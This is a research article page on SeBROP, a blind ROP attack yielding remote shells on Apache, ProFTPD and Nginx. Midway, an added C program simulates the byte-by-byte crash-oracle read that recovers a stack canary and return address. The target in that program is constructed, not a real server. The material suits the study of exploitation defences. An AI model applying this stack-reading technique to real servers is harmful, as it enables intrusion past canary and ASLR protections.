
SeBROP: blind ROP attacks without returns

  • Research Article
  • Published in Frontiers of Computer Science

Abstract

Currently, security-critical server programs are well protected against modern code-reuse attacks such as Return-oriented Programming (ROP) by defense techniques including Address Space Layout Randomization (ASLR), eXecute Only Memory (XOM), and Data Execution Prevention (DEP). Moreover, in these victim programs most syscall instructions are not followed by a ret instruction, which prevents an attack from stitching multiple system calls together to implement advanced behaviors such as launching a remote shell. The lack of this kind of gadget greatly constrains the capability of code-reuse attacks.

This paper proposes a novel code-reuse attack method called Signal Enhanced Blind Return Oriented Programming (SeBROP) to address these challenges. SeBROP can mount a successful exploit against a server-side program using only a stack overflow vulnerability. By leveraging a side channel that exists in the victim program, we show how to find a variety of gadgets blindly, without any prior knowledge and without reading or disassembling the code segment. We then propose a technique that exploits the weakness of the current signal checking mechanism to control the execution flow even when ret instructions are absent. This technique can stitch together a number of system calls without returns, which conventional ROP attacks cannot do. Finally, SeBROP precisely identifies many useful gadgets to constitute a Turing-complete set. The SeBROP attack defeats almost all state-of-the-art defense techniques and works on both modern 64-bit and 32-bit systems.

To validate its effectiveness, we craft SeBROP exploits for three real-world applications: 32-bit Apache 1.3.49, 32-bit ProFTPD 1.3.0, and 64-bit Nginx 1.4.0. Experimental results demonstrate that SeBROP can successfully spawn a remote shell on Nginx, ProFTPD, and Apache with fewer than 8500, 4300, and 2100 requests, respectively.
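The abstract does not say which side channel SeBROP relies on, only that one exists in the victim program. The classic oracle used by blind ROP against forking servers (the one introduced in Hacking Blind) is crash versus no-crash: every forked worker inherits the same stack canary and the same randomized addresses from its parent, so an attacker can overflow the buffer one byte further each time and watch whether the connection is reset or completes. The following C program is an added, constructed simulation of that oracle, not code from the paper; the target layout, the secret values and the request interface are all assumptions made for the example, and the "request" counter plays the role the per-exploit request counts above measure.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 64                      /* size of the overflowable buffer */
#define SECRET_LEN 24                   /* canary + saved rbp + return address */

enum outcome { SURVIVED, CRASHED };     /* what one connection lets the attacker observe */

/* Constructed target state (assumption: values chosen here, not from the paper).
 * A fork()ed worker inherits these from the parent, so they are identical for
 * every connection even though ASLR and the canary were randomised at start-up;
 * that persistence is what a byte-by-byte read depends on. */
struct target {
    uint64_t canary;                    /* glibc canaries keep their low byte 0 */
    uint64_t saved_rbp;
    uint64_t return_address;
    unsigned long requests;             /* connections consumed by the attacker */
};

static struct target make_target(void)
{
    struct target t = { 0x5a3c9f17e2b4d600ULL, 0x00007ffd2c1a4e30ULL,
                        0x000055c0a3d1b7e5ULL, 0 };
    return t;
}

/* Simulated vulnerable handler: copies the request into a fixed buffer with no
 * bounds check, so bytes past BUF_LEN land on the canary, saved rbp and return
 * address that follow it on the stack. Simplification: the worker is treated as
 * crashing as soon as any of those three words differs from the original; a
 * real server dies on the canary check or when it returns into garbage. */
static enum outcome handle_request(struct target *t, const uint8_t *req, size_t len)
{
    uint8_t frame[BUF_LEN + SECRET_LEN];
    t->requests++;
    memcpy(frame + BUF_LEN, &t->canary, 8);
    memcpy(frame + BUF_LEN + 8, &t->saved_rbp, 8);
    memcpy(frame + BUF_LEN + 16, &t->return_address, 8);
    if (len > sizeof frame)
        len = sizeof frame;
    memcpy(frame, req, len);            /* the stack overflow */
    if (memcmp(frame + BUF_LEN, &t->canary, 8) != 0)
        return CRASHED;                 /* __stack_chk_fail: worker aborts */
    if (memcmp(frame + BUF_LEN + 8, &t->saved_rbp, 8) != 0)
        return CRASHED;                 /* corrupted frame pointer */
    if (memcmp(frame + BUF_LEN + 16, &t->return_address, 8) != 0)
        return CRASHED;                 /* returned into garbage */
    return SURVIVED;
}

/* Attacker side: recover `nbytes` bytes past the buffer, one byte at a time.
 * Each probe resends the bytes already learned plus one candidate for the next
 * position; the worker survives only when the candidate is right. Worst case is
 * 256 connections per byte (expected 128) instead of 2^64 for a whole word, and
 * the zero bytes of the canary and of user-space pointers come for free. */
static size_t stack_read(struct target *t, uint8_t *out, size_t nbytes)
{
    uint8_t req[BUF_LEN + SECRET_LEN];
    size_t i;
    memset(req, 'A', BUF_LEN);          /* filler up to the end of the buffer */
    if (nbytes > SECRET_LEN)
        nbytes = SECRET_LEN;
    for (i = 0; i < nbytes; i++) {
        int guess, found = -1;
        for (guess = 0; guess < 256; guess++) {
            req[BUF_LEN + i] = (uint8_t)guess;
            if (handle_request(t, req, BUF_LEN + i + 1) == SURVIVED) {
                found = guess;
                break;
            }
        }
        if (found < 0)
            return i;                   /* oracle did not behave as assumed */
        out[i] = (uint8_t)found;
    }
    return nbytes;
}

static uint64_t le64(const uint8_t *p)
{
    uint64_t v = 0;
    int i;
    for (i = 7; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* Run the read against the constructed target. Returns the number of
 * connections it took, or -1 if any recovered word is wrong. */
long demo_stack_read(void)
{
    struct target t = make_target();
    uint8_t leaked[SECRET_LEN];
    if (stack_read(&t, leaked, SECRET_LEN) != SECRET_LEN)
        return -1;
    if (le64(leaked) != t.canary || le64(leaked + 8) != t.saved_rbp ||
        le64(leaked + 16) != t.return_address)
        return -1;
    return (long)t.requests;
}

int main(void)
{
    long n = demo_stack_read();
    printf("recovered canary, saved rbp and return address in %ld requests\n", n);
    return n < 0;
}
```

With the constructed values the whole 24-byte read costs 2613 connections, the same order of magnitude as the request counts reported above. The leaked return address is what turns a blind attack into a targeted one: it pins the code segment's base despite ASLR, after which gadget probing proceeds by the same survive/crash observation. A real oracle is noisier than this simulation (timeouts, hangs and partial responses all have to be classified), and a server that re-randomizes or re-executes its workers on every connection removes the persistence the read relies on.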



Acknowledgements

We thank the FCS editor and all the anonymous reviewers for their constructive comments on this paper. We also thank all the people who helped refine this work.

Author information

Corresponding author: Tianning Zhang.

Additional information

Tianning Zhang received the BS degree from Nanjing University of Chinese Medicine, China in 2013. She is currently working towards the PhD degree in the Department of Computer Science and Technology at Nanjing University, China. Her research interests include software and system security.

Miao Cai received his PhD degree in computer science and technology from Nanjing University, China in 2020. He is now an assistant researcher at Hohai University, China. His research interests include operating system and memory/storage system.

Diming Zhang received his PhD degree in computer science and technology from Nanjing University, China in 2019. In 2011, he joined the College of Computer Engineering, Jiangsu University of Science and Technology, China as a lecturer. His current research interests are operating systems and parallel computing.

Hao Huang received the BS degree from Xiamen University, China in 1982 and the PhD degree from Nanjing University, China in 1999. He is now a professor in the Department of Computer Science and Technology at Nanjing University, China. His research interests include operating system and system security.


Cite this article

Zhang, T., Cai, M., Zhang, D. et al. SeBROP: blind ROP attacks without returns. Front. Comput. Sci. 16, 164818 (2022). https://doi.org/10.1007/s11704-021-0342-8
